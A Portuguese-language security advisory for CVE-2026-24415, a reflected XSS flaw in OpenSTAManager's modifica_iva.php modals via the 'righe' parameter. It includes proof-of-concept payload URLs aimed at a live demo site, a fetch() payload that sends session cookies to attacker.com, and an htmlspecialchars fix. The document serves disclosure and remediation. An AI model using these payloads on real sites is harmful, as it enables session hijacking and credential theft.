
CVE-2026-24415 - OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter
| Campo | Detalhes |
|---|---|
| ID do CVE | CVE-2026-24415 |
| Severidade | MÉDIA |
| Aviso | Ver Aviso |
| Descoberto por | Lukasz Rybak |
Múltiplas vulnerabilidades de Cross-Site Scripting Refletido (XSS) no OpenSTAManager v2.9.8 permitem que atacantes não autenticados executem código JavaScript arbitrário no contexto dos navegadores de outros usuários através de parâmetros de URL manipulados, potencialmente levando ao sequestro de sessão, roubo de credenciais e ações não autorizadas.
Parâmetro Vulnerável: righe (GET)
O OpenSTAManager v2.9.8 contém múltiplas vulnerabilidades de XSS Refletido em modais de modificação de faturas/pedidos/contratos. A aplicação falha em sanitizar adequadamente a entrada fornecida pelo usuário a partir do parâmetro GET righe antes de refleti-la na saída HTML.
Localização do Código Vulnerável:
Arquivo: /modules/contratti/modals/modifica_iva.php (Linha 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
O parâmetro $_GET['righe'] é diretamente ecoado no atributo HTML value sem qualquer sanitização usando htmlspecialchars() ou funções equivalentes. Isso permite que um atacante saia do contexto do atributo e injete HTML/JavaScript arbitrário.
Todos os Arquivos Afetados:
/modules/contratti/modals/modifica_iva.php - Linha 125, Linha 167/modules/preventivi/modals/modifica_iva.php - Linha 125, Linha 167/modules/fatture/modals/modifica_iva.php - Linha 121, Linha 161/modules/ddt/modals/modifica_iva.php - Linha 125, Linha 167/modules/ordini/modals/modifica_iva.php - Linha 125, Linha 167/modules/interventi/modals/modifica_iva.php - Linha 125, Linha 167Pré-requisitos:
Passo 1: Login
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Passo 2: Disparar XSS Navegue para a seguinte URL em um navegador (ou use curl com cookies):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
URLs Testadas (Todas vulneráveis):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Resultado Esperado: Popup de alerta JavaScript exibe mostrando o cookie de sessão atual, confirmando a execução do código.
Saída HTML (verificada em instância ao vivo):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Verificação:
Payloads Alternativos:
Roubo de sessão: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Usuários Afetados: Todos os usuários autenticados com acesso aos módulos de contratos, faturas, cotações ou pedidos.
Cenário de Ataque:
Correção Recomendada:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Aplique esta correção a todos os arquivos afetados listados na seção Detalhes.
Este CVE foi divulgado de forma responsável seguindo práticas coordenadas de divulgação de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e defensivos.